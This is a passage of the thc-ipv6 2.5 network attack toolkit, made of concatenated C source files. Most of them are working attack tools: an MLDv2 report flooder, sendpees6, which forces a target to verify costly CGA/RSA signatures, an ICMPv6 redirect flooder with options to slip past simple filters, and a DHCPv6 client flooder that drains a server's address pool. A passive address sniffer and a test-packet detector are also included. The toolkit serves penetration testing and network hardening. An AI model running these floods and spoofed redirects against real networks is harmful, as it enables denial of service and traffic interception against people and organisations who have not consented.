= 0; if (argc < 2 || argc > 4 || strncmp(argv[1], "-h", 2) == 0) help(argv[0]); if (strcmp(argv[1], "-r") == 0) { thc_ipv6_rawmode(1); rawmode = 1; argv++; argc--; } srand(time(NULL) + getpid()); setvbuf(stdout, NULL, _IONBF, 0); interface = argv[1]; if (thc_get_own_mac(interface) == NULL) { fprintf(stderr, "Error: invalid interface %s\n", interface); exit(-1); } if (argc > 2) if ((dst = thc_resolve6(argv[2])) == NULL) { fprintf(stderr, "Error: can not resolve %s\n", argv[2]); exit(-1); } mac[0] = 0x00; mac[1] = 0x18; ip6[9] = mac[1]; memset(buf, 0, sizeof(buf)); buf[0] = 5; buf[1] = 2; memset(buf2, 0, sizeof(buf2)); for (i = 0; i < RECORD_NUMBER; i++) { buf2[0 + i * 36] = 3; // CHANGE_TO_INCLUDE_MODE buf2[3 + i * 36] = 1; buf2[4 + i * 36] = 0xff; buf2[5 + i * 36] = 0x02; memcpy(buf2 + 20 + i * 36, ip6, 16); } printf("Starting to flood network with MLDv2 reports on %s (Press Control-C to end, a dot is printed for every 1000 packets):\n", interface); while (1) { for (i = 0; i < 4; i++) mac[2 + i] = rand() % 256; // ip6[9] = mac[1]; ip6[10] = mac[2]; ip6[13] = mac[3]; ip6[14] = mac[4]; ip6[15] = mac[5]; for (i = 0; i < RECORD_NUMBER; i++) { for (j = 0; j < 6; j++) buf2[14 + j + i * 36] = rand() % 256; memcpy(buf2 + 29 + i * 36, ip6 + 9, 7); } count++; if ((pkt = thc_create_ipv6_extended(interface, PREFER_LINK, &pkt_len, ip6, dst, 1, 0, 0, 0, 0)) == NULL) return -1; if (thc_add_hdr_hopbyhop(pkt, &pkt_len, buf, 6) < 0) return -1; if (thc_add_icmp6(pkt, &pkt_len, ICMP6_MLD2_REPORT, 0, RECORD_NUMBER, buf2, sizeof(buf2), 0) < 0) return -1; if (thc_generate_and_send_pkt(interface, mac6, dstmac, pkt, &pkt_len) < 0) { // fprintf(stderr, "Error sending packet no. %d on interface %s: ", count, interface); // perror(""); // return -1; printf("!"); } pkt = thc_destroy_packet(pkt); // usleep(1); if (count % 1000 == 0) printf("."); } return 0; } thc-ipv6-2.5/sendpees6.c0000644000000000000000000000417312251022441013554 0ustar rootroot#include #include #ifndef _HAVE_SSL int main() { fprintf(stderr, "Error: thc-ipv6 was compiled without openssl support, sendpees6 disabled.\n"); return -1; } #else #include #include #include #include #include #include "thc-ipv6.h" int main(int argc, char **argv) { thc_cga_hdr *cga_opt; thc_key_t *key; struct in6_addr addr6; unsigned char *pkt = NULL; unsigned char *dst6, *cga, *dev; char dummy[24], prefix[8], addr[50]; char dsthw[] = "\xff\xff\xff\xff\xff\xff"; char srchw[] = "\xdd\xde\xad\xbe\xef\xff"; int pkt_len = 0; if (argc != 5) { printf("sendpees6 by willdamn \n\n"); printf("Syntax: %s interface key_length prefix victim\n\n", argv[0]); printf("Send SEND neighbor solicitation messages and make target to verify a lota CGA and RSA signatures\n\n"); exit(1); } dev = argv[1]; if (thc_get_own_ipv6(dev, NULL, PREFER_LINK) == NULL) { fprintf(stderr, "Error: invalid interface %s\n", dev); exit(-1); } memcpy(addr, argv[3], 50); inet_pton(PF_INET6, addr, &addr6); memcpy(prefix, &addr6, 8); key = thc_generate_key(atoi(argv[2])); if (key == NULL) { printf("Couldn't generate key!"); exit(1); } cga_opt = thc_generate_cga(prefix, key, &cga); if (cga_opt == NULL) { printf("Error during CGA generation"); exit(1); } dst6 = thc_resolve6(argv[4]); memset(dummy, 'X', sizeof(dummy)); dummy[16] = 1; dummy[17] = 1; memcpy(dummy, dst6, 16); if ((pkt = thc_create_ipv6_extended(dev, PREFER_GLOBAL, &pkt_len, cga, dst6, 0, 0, 0, 0, 0)) == NULL) { printf("Cannot create IPv6 header\n"); exit(1); } if (thc_add_send(pkt, &pkt_len, ICMP6_NEIGHBORSOL, 0xfacebabe, 0x0, dummy, 24, cga_opt, key, NULL, 0) < 0) { printf("Cannot add SEND options\n"); exit(1); } free(cga_opt); if (thc_generate_pkt(dev, srchw, dsthw, pkt, &pkt_len) < 0) { fprintf(stderr, "Couldn't generate IPv6 packet!\n"); exit(1); } printf("Sending..."); fflush(stdout); while (1) thc_send_pkt(dev, pkt, &pkt_len); return 0; } #endifthc-ipv6-2.5/flood_redir6.c0000644000000000000000000001161512251022437014242 0ustar rootroot#include #include #include #include #include #include #include #include #include #include #include "thc-ipv6.h" void help(char *prg) { printf("%s %s (c) 2013 by %s %s\n\n", prg, VERSION, AUTHOR, RESOURCE); printf("Syntax: %s [-HFD] interface [target] [oldrouter [newrouter]]\n\n", prg); printf("Flood the local network with ICMPv6 redirect packets.\n"); printf("-F/-D/-H add fragment/destination/hopbyhop header to bypass simple filters\n"); // printf("Use -r to use raw mode.\n\n"); exit(-1); } int main(int argc, char *argv[]) { char *interface, mac[6] = "", newroutermac[6]; unsigned char *mac6 = mac; unsigned char buf[1460], buf2[6], buf3[1504]; unsigned char *dst = thc_resolve6("ff02::1"), *fake_src = NULL, *fake_dst = NULL, *dstmac = NULL, *oldrouter = NULL, *newrouter = NULL; int i, j, k, type = NXT_ICMP6, offset = 14, rand_newrouter = 1; unsigned char *pkt = NULL, *pkt2 = NULL; int pkt_len = 0, pkt_len2 = 0, rawmode = 0, count = 0, do_hop = 0, do_frag = 0, do_dst = 0; int until = 0; thc_ipv6_hdr *hdr = NULL, *hdr2 = NULL; if (argc < 2 || strncmp(argv[1], "-h", 2) == 0) help(argv[0]); while ((i = getopt(argc, argv, "DFH")) >= 0) { switch (i) { case 'F': do_frag++; break; case 'H': do_hop = 1; break; case 'D': do_dst = 1; break; default: fprintf(stderr, "Error: invalid option %c\n", i); exit(-1); } } if (argc - optind < 1) help(argv[0]); srand(time(NULL) + getpid()); setvbuf(stdout, NULL, _IONBF, 0); interface = argv[optind]; if (argc - optind > 1) { dst = thc_resolve6(argv[optind + 1]); fake_src = dst; } else fake_src = thc_resolve6("fe80::"); dstmac = thc_get_multicast_mac(dst); if (argc - optind > 2) { oldrouter = thc_resolve6(argv[optind + 2]); if ((mac6 = thc_get_mac(interface, NULL, dst)) == NULL) mac6 = thc_get_own_mac(interface); } else { oldrouter = thc_get_own_ipv6(interface, dst, PREFER_LINK); mac6 = thc_get_own_mac(interface); } if (mac6 == NULL) { fprintf(stderr, "Error: invalid interface %s\n", interface); exit(-1); } if (argc - optind > 3) { newrouter = thc_resolve6(argv[optind + 2]); rand_newrouter = 0; } else newrouter = thc_resolve6("fe80::2"); fake_dst = thc_resolve6("2004::1"); memset(newroutermac, 0, 6); if ((pkt2 = thc_create_ipv6_extended(interface, PREFER_LINK, &pkt_len2, fake_src, fake_dst, 0, 0, 0, 0, 0)) == NULL) return -1; if (thc_add_icmp6(pkt2, &pkt_len2, ICMP6_PING, 0, 0, NULL, 0, 0) < 0) return -1; thc_generate_pkt(interface, mac6, dstmac, pkt2, &pkt_len2); hdr = (thc_ipv6_hdr *) pkt2; k = rand(); newroutermac[1] = 2; memcpy(newroutermac + 2, (char*) &k + _TAKE4, 4); k++; if (do_hdr_size) offset = do_hdr_size; memset(buf2, 0, sizeof(buf2)); memset(buf3, 0, sizeof(buf3)); memset(buf, 0, sizeof(buf)); j = 0; buf[j++] = 0; // etc. memcpy(buf, newrouter, 16); memcpy(buf + 16, fake_dst, 16); buf[32] = 2; buf[33] = 1; memcpy(buf + 34, newroutermac, 6); buf[40] = 4; buf[41] = (hdr->pkt_len - offset + 8) / 8; memcpy(buf + 48, hdr->pkt + offset, (buf[41] - 1) * 8); j = 40 + buf[41] * 8; printf("Starting to flood with ICMPv6 redirects on %s (Press Control-C to end, a dot is printed for every 1000 packets):\n", interface); while (until != 1) { if (rand_newrouter) memcpy(buf + 8, (char*)&k + _TAKE4, 4); // new router memcpy(buf + 16 + 2, (char*)&k + _TAKE4, 4); // orig dst memcpy(buf + 34 + 2, (char*) &k + _TAKE4, 4); // new router mac k++; count++; if ((pkt = thc_create_ipv6_extended(interface, PREFER_LINK, &pkt_len, oldrouter, dst, 255, 0, 0, 0, 0)) == NULL) return -1; if (do_hop) { type = NXT_HBH; if (thc_add_hdr_hopbyhop(pkt, &pkt_len, buf2, sizeof(buf2)) < 0) return -1; } if (do_frag) { if (type == NXT_ICMP6) type = NXT_FRAG; for (i = 0; i < do_frag; i++) if (thc_add_hdr_oneshotfragment(pkt, &pkt_len, count + i) < 0) return -1; } if (do_dst) { if (type == NXT_ICMP6) type = NXT_DST; if (thc_add_hdr_dst(pkt, &pkt_len, buf3, sizeof(buf3)) < 0) return -1; } if (thc_add_icmp6(pkt, &pkt_len, ICMP6_REDIR, 0, 0, buf, j, 0) < 0) return -1; if (do_dst) { thc_generate_pkt(interface, mac6, dstmac, pkt, &pkt_len); hdr2 = (thc_ipv6_hdr *) pkt; thc_send_as_fragment6(interface, oldrouter, dst, type, hdr2->pkt + 40 + offset, hdr2->pkt_len - 40 - offset, 1240); } else { if (thc_generate_and_send_pkt(interface, mac6, dstmac, pkt, &pkt_len) < 0) { printf("!"); } } pkt = thc_destroy_packet(pkt); // usleep(1); if (count % 1000 == 0) printf("."); if (until > 1) until--; } return 0; } thc-ipv6-2.5/passive_discovery6.c0000644000000000000000000001224612251022440015506 0ustar rootroot#include #include #include #include #include #include #include #include #include #include #include "thc-ipv6.h" #define MAX_ENTRIES 65536 int maxhop = 255, dcnt = 0, do_dst = 0, noverb = 0; unsigned char d[MAX_ENTRIES + 1][16], hostpart[8]; char *interface, *script = NULL, exec[256], *replace = NULL, *ll; void help(char *prg) { printf("%s %s (c) 2013 by %s %s\n\n", prg, VERSION, AUTHOR, RESOURCE); printf("Syntax: %s [-Ds] [-m maxhop] [-R prefix] interface [script]\n\n", prg); printf("Options:\n"); printf(" -D do also dump destination addresses (does not work with -m)\n"); printf(" -s do only print the addresses, no other output\n"); printf(" -m maxhop the maximum number of hops a target which is dumped may be away.\n"); printf(" 0 means local only, the maximum amount to make sense is usually 5\n"); printf(" -R prefix exchange the defined prefix with the link local prefix\n"); printf("\nPassivly sniffs the network and dump all client's IPv6 addresses detected.\n"); printf("Note that in a switched environment you get better results when additionally\nstarting parasite6, however this will impact the network.\n"); printf("If a script name is specified after the interface, it is called with the\ndetected ipv6 address as first and the interface as second option.\n"); exit(-1); } void detect(u_char *foo, const struct pcap_pkthdr *header, unsigned char *data) { char *ptr = data, *ptr2; int i, j, k, offset = 8, doit, len = header->caplen; if (do_hdr_size) { len -= do_hdr_size; ptr += do_hdr_size; thc_dump_data(ptr, 8, "packet"); if ((ptr[0] & 240) != 0x60) return; } else { len -= 14; ptr += 14; } // drop ff00::/8 and ::/128 for (k = 0; k <= do_dst; k++) { doit = 0; if (ptr[offset] != 0xff && ( maxhop > 254 || ptr[7] >= 255 - maxhop || (ptr[7] >= 128 - maxhop && ptr[7] <= 128) || (ptr[7] >= 64 - maxhop && ptr[7] <= 64) ) ) doit = 1; if (memcmp(ptr + 8, d[dcnt + 1], 16) == 0) { if (k == 0 && ptr[7] == 255 && ptr[6] == NXT_ICMP6 && ptr[40] == ICMP6_NEIGHBORSOL && len >= 64) { doit = 1; // DAD packet offset = 48; } else doit = 0; } // is it our own address? if (memcmp(ptr + offset + 8, hostpart, 8) == 0) doit = 0; if (doit) { // replace prefix with link-local if -R if (replace != NULL) if (memcmp(ptr + offset, replace, 8) == 0) memcpy(ptr + offset, ll, 8); // check for doubles j = 0; if (dcnt > 0) for (i = 0; i < dcnt && j == 0; i++) if (memcmp(ptr + offset, d[i], 16) == 0) j = 1; if (j == 0) { // no double ptr2 = thc_ipv62notation((char *) (ptr + offset)); printf("%s%s\n", noverb == 0 ? "Detected: " : "", ptr2); if (dcnt < MAX_ENTRIES) { // add to double list memcpy(d[dcnt], ptr + offset, 16); dcnt++; } else if (dcnt == MAX_ENTRIES) { // table full? should not happen, smells like attack dcnt++; fprintf(stderr, "Warning: Table for detected IPv6 addresses is full, doubles can occur now!\n"); } if (script != NULL && fork() == 0) { // beware, this can DOS you (void) wait3(NULL, WNOHANG, NULL); snprintf(exec, sizeof(exec), "%s %s %s\n", script, ptr2, interface); if (system(exec) < 0) fprintf(stderr, "Error: Executing failed - %s\n", exec); exit(0); } free(ptr2); } } offset += 16; } } int main(int argc, char *argv[]) { int i; char *glob; if (argc < 2 || strncmp(argv[1], "-h", 2) == 0) help(argv[0]); setvbuf(stdout, NULL, _IONBF, 0); setvbuf(stderr, NULL, _IONBF, 0); while ((i = getopt(argc, argv, "Dsm:R:")) >= 0) { switch (i) { case 'm': maxhop = atoi(optarg); break; case 'D': do_dst = 1; break; case 's': noverb = 1; break; case 'R': if ((ll = index(optarg, '/')) != NULL) *ll = 0; replace = thc_resolve6(optarg); break; default: fprintf(stderr, "Error: invalid option %c\n", i); exit(-1); } } if (argc - optind < 1 || argc - optind > 2) help(argv[0]); interface = argv[optind]; if (argc == optind + 2) script = argv[optind + 1]; memset(d, 0, sizeof(d)); _thc_ipv6_showerrors = 0; // we dont want our own address in the discovered addresses glob = thc_get_own_ipv6(interface, NULL, PREFER_GLOBAL); ll = thc_get_own_ipv6(interface, NULL, PREFER_LINK); memcpy(hostpart, ll + 8, 8); if (memcmp(ll + 8, glob + 8, 8) != 0) { // do we have a global address with a different host part? memcpy(d[0], glob, 16); dcnt = 1; } if (do_dst < 255 && do_dst) fprintf(stderr, "Warning: it does not make sense to use the -m and -D options together!\n"); if (noverb == 0) printf("Started IPv6 passive system detection (Press Control-C to end) ...\n"); return thc_pcap_function(interface, "ip6", (char *) detect, 1, NULL); return 0; // never reached } thc-ipv6-2.5/implementation6d.c0000644000000000000000000001200312251022437015133 0ustar rootroot/* * Test: * 1. next header = hopbyhop, but no header * 2. next header = hopbyhop, but invalid length in hopbyhop header * 3. next header = hophyhop + no_next, but ip6 length longer than claimed * 4. next header = hophyhop + no_next, but ip6 length shorter than claimed * 5. 90 extension ignored headers * 6. 65535 byte packet (fragmented) with 3850 extension ignored headers * 7. jumbo packet (fragmented) with 7700 extension ignored headers * 8-10: same as 5-9 but final length larger than real packet * 11. 180 hop-by-bop headers * 12. forwarding header with 255 segements lefts (but only 1 defined) * * * misc: * - toobig6 with mtu = 600 on target * - alive6 with target ff02::1 and router = target * - alive6 with target = target and router = target (1shot frag + forward) * - rsmurf on target */ #include #include #include #include #include #include #include #include #include #include #include "thc-ipv6.h" int rawmode = 0; int cont = 0; void help(char *prg) { printf("%s %s (c) 2013 by %s %s\n\n", prg, VERSION, AUTHOR, RESOURCE); printf("Syntax: %s interface\n\n", prg); printf("Identifies test packets by the implementation6 tool, useful to check what\n"); printf("packets passed a firewall\n"); // printf("Use -r to use raw mode.\n\n"); exit(-1); } void check_packet(u_char *foo, const struct pcap_pkthdr *header, const unsigned char *data) { unsigned char *ipv6hdr; unsigned char buf[20]; int add = 0, len = header->caplen; if (debug) { printf("DEBUG: packet received\n"); thc_dump_data((unsigned char *) data, header->caplen, "Received Packet"); } if (rawmode == 0) { if (do_hdr_size) { ipv6hdr = (unsigned char *) (data + do_hdr_size); len -= do_hdr_size; if ((ipv6hdr[0] & 240) != 0x60) return; } else { ipv6hdr = (unsigned char *) (data + 14); len -= 14; } } else ipv6hdr = (unsigned char *) data; if (ipv6hdr[0] >> 4 != 6) return; // not an ipv6 packet if (ipv6hdr[6] == NXT_ICMP6 && (ipv6hdr[40] == ICMP6_NEIGHBORSOL || ipv6hdr[40] == ICMP6_NEIGHBORADV || ipv6hdr[40] == ICMP6_PARAMPROB || ipv6hdr[40] == ICMP6_TTLEXEED)) return; if (len >= 136) { if (ipv6hdr[6] == 0 && ipv6hdr[40] == 0 && ipv6hdr[48] == 0) { printf(" Detected (potential) implementation6 test case #%d %s\n", 3, cont == 3 ? "(cont'd)" : ""); cont = 3; return; } buf[0] = ipv6hdr[124]; memset(buf + 1, buf[0], sizeof(buf) - 1); if (memcmp(ipv6hdr + 128, buf, sizeof(buf)) == 0) { printf(" Detected (potential) implementation6 test case #%d %s\n", buf[0], cont == buf[0] ? "(cont'd)" : ""); cont = buf[0]; return; } } if (len >= 46) { switch (ipv6hdr[6]) { case NXT_ICMP6: if (1 == 1) { switch (ipv6hdr[40]) { case ICMP6_PINGREQUEST: if (ipv6hdr[44] == 0x34 && ipv6hdr[45] == 0x56 && ipv6hdr[46] == 0x78 && ipv6hdr[47] == 0x90 && ipv6hdr[52] == 'A') { printf(" Detected (potential) implementation6 standard thc-ipv6 ping request%s\n", cont == -1 ? " (cont'd)" : ""); cont = -1; } return; break; case ICMP6_INFOREQUEST: if (ipv6hdr[48] == 20 + add) { printf(" Detected (potential) implementation6 test case #%d\n", 20 + add); cont = 0; } return; break; case ICMP6_INVNEIGHBORSOL: printf(" Detected (potential) implementation6 test case #%d\n", 21 + add); cont = 0; return; break; case ICMP6_CERTPATHSOL: if (ipv6hdr[45] == 23 + add) { printf(" Detected (potential) implementation6 test case #%d\n", 23 + add); cont = 0; } return; break; default: break; } } return; break; case NXT_OPTS: if (ipv6hdr[64] == ICMP6_MOBILE_PREFIXSOL) { if (ipv6hdr[69] == 22 + add) { printf(" Detected (potential) implementation6 test case #%d\n", 22 + add); cont = 0; } return; } break; default: break; } } return; } int main(int argc, char *argv[]) { unsigned char string[64] = "ip6"; char *interface; if (argv[1] != NULL && strcmp(argv[1], "-r") == 0) { thc_ipv6_rawmode(1); rawmode = 1; argv++; argc--; } if (argc != 2 || strncmp(argv[1], "-h", 2) == 0) help(argv[0]); interface = argv[1]; setvbuf(stdout, NULL, _IONBF, 0); printf("Waiting for implementation check packets on %s, press Control-C to end.\n", interface); if (thc_pcap_function(interface, string, (char *) check_packet, 0, NULL) < 0) { fprintf(stderr, "Error: could not capture on interface %s with string %s\n", interface, string); exit(-1); } // never returns return 0; } thc-ipv6-2.5/flood_dhcpc6.c0000644000000000000000000001634212251022436014217 0ustar rootroot#include #include #include #include #include #include #include #include #include #include #include #include #include "thc-ipv6.h" char *interface = NULL, *dns_name = NULL, elapsed[6] = { 0, 8, 0, 2, 0, 0 }; int counter = 0, do_dns = 0; // start0: 1-3 rand, 18-21 rand, 22-27 mac, 32-35 rand char solicit[] = { 0x01, 0x00, 0x00, 0x00, 0x00, 0x08, 0x00, 0x02, 0x00, 0x00, 0x00, 0x01, 0x00, 0x0e, 0x00, 0x01, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x03, 0x00, 0x0c, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 }; char dnsupdate1[] = { 0, 39, 0, 8, 1, 6, 122, 97, 97, 97, 97, 97 }; char dnsupdate2[] = { 0, 6, 0, 2, 0, 39 }; void help(char *prg) { printf("%s %s (c) 2013 by %s %s\n\n", prg, VERSION, AUTHOR, RESOURCE); printf("Syntax: %s [-n|-N] [-1] [-d domain-name] interface [dhcpserver]\n\n", prg); printf("DHCP client flooder. Use to deplete the IP address pool a DHCP6 server is\n"); printf("offering. Note: if the pool is very large, this is rather senseless. :-)\n\n"); printf("By default the link-local IP MAC address is random, however this won't work\n"); printf("in some circumstances. -n will use the real MAC, -N the real MAC and\n"); printf("link-local address. -1 will only solicate an address but not request it.\n"); printf("If -N is not used, you should run parasite6 in parallel.\n"); printf("Use -d to force DNS updates, you must specify a domain name.\n"); exit(-1); } void check_packets(u_char *foo, const struct pcap_pkthdr *header, const unsigned char *data) { int len = header->caplen, pkt_len = 0, mlen = 10, olen; unsigned char *ptr = (unsigned char *) data, *pkt = NULL; char *smac, mac[6] = { 0, 0x0d, 0, 0x0d, 0x0d, 0x0e }; char mybuf[1024] = { 0x03, 0, 0, 0, 0, 8, 0, 2, 0, 0 }; if (do_hdr_size) { data += do_hdr_size; len -= do_hdr_size; if ((data[0] & 240) != 0x60) return; } else { data += 14; len -= 14; } if (len < 126 || data[6] != NXT_UDP || data[48] != 2) return; data += 48; len -= 48; memcpy(mybuf + 1, data + 1, 3); data += 4; len -= 4; while (len >= 4) { if ((olen = data[2] * 256 + data[3]) > len - 4 || olen < 0) { printf("Information: evil packet received\n"); olen = 0; len = -1; } else { if (data[1] > 1 && data[1] <= 3) { memcpy(mybuf + mlen, data, olen + 4); mlen += olen + 4; } else if (data[1] == 1) { memcpy(mybuf + mlen, data, olen + 4); mlen += olen + 4; //smac auf client mac in paket setzen if (olen == 14) smac = (char *) (data + 12); else smac = mac; } else if (data[1] == 39 && do_dns) { memcpy(mybuf + mlen, data, olen + 4); mybuf[mlen + 4] = 1; // force server to write dns entry mlen += olen + 4; } data += olen + 4; len -= olen + 4; if (len < 0) { printf("Information: evil packet received\n"); len = -1; } } } if (len >= 0) { counter++; if ((pkt = thc_create_ipv6_extended(interface, PREFER_LINK, &pkt_len, ptr + 38, ptr + 22, 1, 0, 0, 0, 0)) == NULL) return; if (thc_add_udp(pkt, &pkt_len, 546, 547, 0, mybuf, mlen) < 0) return; if (thc_generate_and_send_pkt(interface, smac, ptr + 6, pkt, &pkt_len) < 0) return; pkt = thc_destroy_packet(pkt); if (counter % 1000 == 0) printf("!"); } } int main(int argc, char *argv[]) { char mac[6] = { 0, 0x0c, 0, 0, 0, 0 }, *pkt = NULL; char wdatabuf[1024]; unsigned char *mac6 = mac, *src, *dst; int i, s, len, pkt_len = 0, dlen = 0; unsigned long long int count = 0; pcap_t *p = NULL; int do_all = 1, use_real_mac = 0, use_real_link = 0; if (argc < 2 || strncmp(argv[1], "-h", 2) == 0) help(argv[0]); if (getenv("THC_IPV6_PPPOE") != NULL || getenv("THC_IPV6_6IN4") != NULL) printf("WARNING: %s is not working with injection!\n", argv[0]); while ((i = getopt(argc, argv, "d:nNr1")) >= 0) { switch (i) { case 'N': use_real_link = 1; // no break case 'n': use_real_mac = 1; break; case '1': do_all = 0; case 'd': do_dns = 1; dns_name = optarg; case 'r': i = 0; break; // just to ignore -r default: fprintf(stderr, "Error: unknown option -%c\n", i); exit(-1); } } memset(mac, 0, sizeof(mac)); interface = argv[optind]; if (use_real_link) src = thc_get_own_ipv6(interface, NULL, PREFER_LINK); else src = thc_resolve6("fe80::"); if (use_real_mac) mac6 = thc_get_own_mac(interface); if (argc - optind <= 1) dst = thc_resolve6("ff02::1:2"); else dst = thc_resolve6(argv[optind + 1]); setvbuf(stdout, NULL, _IONBF, 0); setvbuf(stderr, NULL, _IONBF, 0); if (src == NULL || mac6 == NULL) { fprintf(stderr, "Error: invalid interface %s or bad mac/IP defined\n", interface); exit(-1); } // only to prevent our system to send icmp port unreachable messages if ((s = thc_bind_udp_port(546)) < 0) fprintf(stderr, "Warning: could not bind to 546/udp\n"); if ((p = thc_pcap_init_promisc(interface, "ip6 and udp and dst port 546")) == NULL) { fprintf(stderr, "Error: can not open interface %s in promisc mode\n", interface); exit(-1); } len = sizeof(solicit); memcpy(wdatabuf, solicit, len); if (do_dns) { memcpy(wdatabuf + len, dnsupdate1, sizeof(dnsupdate1)); dlen = len + 8; len += sizeof(dnsupdate1); if (dns_name != NULL && strlen(dns_name) < 240) { if (dns_name[0] != '.') { wdatabuf[len] = '.'; wdatabuf[dlen - 5]++; wdatabuf[dlen - 3]++; len++; } memcpy(wdatabuf + len, dns_name, strlen(dns_name) + 1); wdatabuf[dlen - 5] += strlen(dns_name) + 1; wdatabuf[dlen - 3] += strlen(dns_name) + 1; len += strlen(dns_name) + 1; } memcpy(wdatabuf + len, dnsupdate2, sizeof(dnsupdate2)); len += sizeof(dnsupdate2); } printf("Starting to flood dhcp6 servers locally on %s (Press Control-C to end) ...\n\n", interface); while (1) { count++; if (!use_real_link) memcpy(src + 8, (char *) &count, 8); // start0: 1-3 rand, 18-21 rand, 22-27 mac, 32-35 rand for (i = 0; i < 3; i++) { wdatabuf[i + 32] = rand() % 256; wdatabuf[i + 18] = rand() % 256; mac[i + 2] = rand() % 256; if (do_dns) wdatabuf[i + dlen] = 'a' + rand() % 26; } if (!use_real_mac) memcpy(wdatabuf + 22, mac, 6); memcpy(wdatabuf + 1, (char *) &count + _TAKE3, 3); if ((pkt = thc_create_ipv6_extended(interface, PREFER_LINK, &pkt_len, src, dst, 1, 0, 0, 0, 0)) == NULL) return -1; if (thc_add_udp(pkt, &pkt_len, 546, 547, 0, wdatabuf, len) < 0) return -1; // we have to tone it down, otherwise we will not get advertisements if (thc_generate_and_send_pkt(interface, mac6, NULL, pkt, &pkt_len) < 0) printf("!"); pkt = thc_destroy_packet(pkt); if (do_all) { usleep(75); while (thc_pcap_check(p, (char *) check_packets, NULL) > 0); } if (count % 1000 == 0) printf("."); } return 0; // never reached } thc-ipv6-2.5/inject_alive6.c0000644000000000000000000001422412251022437014405 0ustar rootroot#include #include #include #include #include #include #include #include #include #include #include #include "thc-ipv6.h" extern int thc_socket; extern char *do_hdr; extern int do_hdr_off; int type = 0, passive = 0, active = 0; char *interface; void help(char *prg) { printf("%s %s (c) 2013 by %s %s\n\n", prg, VERSION, AUTHOR, RESOURCE); printf("Syntax: %s [-ap] interface\n\n", prg); printf("This tool answers to keep-alive requests on PPPoE and 6in4 tunnels; for PPPoE\nit also sends keep-alive requests.\n"); printf("Note that the appropriate environment variable THC_IPV6_{PPPOE|6IN4} must be set\n"); printf("Option -a will actively send alive requests every 15 seconds.\n"); printf("Option -p will not send replies to alive requests.\n"); exit(-1); } void intercept(u_char *foo, const struct pcap_pkthdr *header, const unsigned char *data) { unsigned char *ipv6hdr, *pkt, buf[1500]; int len = header->caplen, pkt_len = 0; unsigned int *seq, offset = 0; unsigned short int *orig, *seen; thc_ipv6_hdr hdr; if (debug) { printf("DEBUG: packet received\n"); thc_dump_data((unsigned char *)data, len, "Received packet on tunnel"); } if (type == 2) { // 6in4 len -= do_hdr_size; ipv6hdr = (unsigned char*) (data + do_hdr_size); if ((ipv6hdr[0] & 240) != 0x60) return; if (len < 48 || ipv6hdr[6] != NXT_ICMP6 || ipv6hdr[41] != 0) return; seq = (unsigned int *) (ipv6hdr + 44); if (ipv6hdr[40] == ICMP6_PINGREQUEST) { printf("Keep-alive ping request ID 0x%x seen\n", htonl(*seq)); if (passive == 0) { if ((pkt = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len, ipv6hdr + 24, ipv6hdr + 8, 255, 0, 0, 0, 0)) == NULL) return; if (thc_add_icmp6(pkt, &pkt_len, ICMP6_PINGREPLY, 0, htonl(*seq), (unsigned char *) ipv6hdr + 40 + 8, len - 40 - 8, 0) < 0) return; if (thc_generate_and_send_pkt(interface, NULL, NULL, pkt, &pkt_len) < 0) return; pkt = thc_destroy_packet(pkt); printf("Keep-alive ping reply ID 0x%x sent\n", htonl(*seq)); } } if (passive && ipv6hdr[40] == ICMP6_PINGREPLY) printf("Keep-alive ping reply ID 0x%x seen\n", htonl(*seq)); } else { // PPPoE seen = (unsigned short int *) (data + 20 + offset + do_hdr_off); if (len < 40 || len > 1500 || htons(*seen) != 0xc021) return; seen = (unsigned short int *) (data + 16 + offset + do_hdr_off); if (memcmp(data + 16 + offset + do_hdr_off, do_hdr + 16 + offset + do_hdr_off, 2) != 0) { orig = (unsigned short int*) (do_hdr + 16 + offset + do_hdr_off); fprintf(stderr, "Warning: PPPoE SessionID is different to that defined in the environment variable! ((specified) %04x != %04x (seen))\n", htons(*orig), htons(*seen)); } if (data[22 + offset + do_hdr_off] == 9) { printf("Keep-alive request ID 0x%04x seen\n", htons(*seen)); if (passive == 0) { memcpy(buf + 12, data + 12, len - 12); memcpy(buf + 6, data, 6); memcpy(buf, data + 6, 6); buf[22 + offset + do_hdr_off] = 10; hdr.pkt = buf; hdr.pkt_len = len; if (thc_send_pkt(interface, (unsigned char*) &hdr, &len) < 0) { fprintf(stderr, "Error: could not send packet to interface %s (%d)\n", interface, thc_socket); exit(-1); } printf("Keep-alive reply ID 0x%04x sent\n", htons(*seen)); } } else { if (passive && data[22 + offset + do_hdr_off] == 10) printf("Keep-alive reply ID 0x%04x seen\n", htons(*seen)); } } return; } int main(int argc, char *argv[]) { char sndbuf[128], data[] = { 0x09, 0x0a, 0x00, 0x0c, 0xfa, 0xce, 0xba, 0xbe, 0x1f, 0x1e, 0x1d, 0x1c }; time_t passed = 0; pcap_t *p; thc_ipv6_hdr hdr; int sndbuflen = 0, i; if (argc < 2 || strncmp(argv[1], "-h", 2) == 0) help(argv[0]); while ((i = getopt(argc, argv, "adp")) >= 0) { switch(i) { case 'a': active = 1; break; case 'd': debug = 1; break; case 'p': passive = 1; break; default: fprintf(stderr, "Error: invalid option -%c\n", i); exit(-1); } } if (getenv("THC_IPV6_PPPOE") != NULL) type = 1; else if (getenv("THC_IPV6_6IN4") != NULL) type = 2; if (type == 0) { fprintf(stderr, "Error: neither the THC_IPV6_PPPOE nor THC_IPV6_6IN4 environment variable is set\n"); exit(-1); } if (type == 2 && active) fprintf(stderr, "Error: active ping6 sending in for THC_IPV6_6IN4 is not possible. Please use thcping6 or alive6 to perform the active alive packet sending.\n"); interface = argv[optind]; if (thc_get_own_mac(interface) == NULL) { fprintf(stderr, "Error: invalid interface %s\n", interface); exit(-1); } printf("Started %s keep-alive watcher on %s (Press Control-C to end) ...\n", type == 1 ? "PPPoE" : "6in4", argv[optind]); if (active == 1 && type == 1) { if ((p = thc_pcap_init_promisc(interface, "it does not matter what we put here")) == NULL) { fprintf(stderr, "Error: Could not set interface into promiscious mode\n"); exit(-1); } memcpy(sndbuf, do_hdr, do_hdr_size); sndbuf[18 + do_hdr_off] = 0x00; sndbuf[19 + do_hdr_off] = sizeof(data) + 2; sndbuf[20 + do_hdr_off] = 0xc0; sndbuf[21 + do_hdr_off] = 0x21; memcpy(sndbuf + do_hdr_size, data, sizeof(data)); sndbuflen = do_hdr_size + sizeof(data); hdr.pkt = sndbuf; 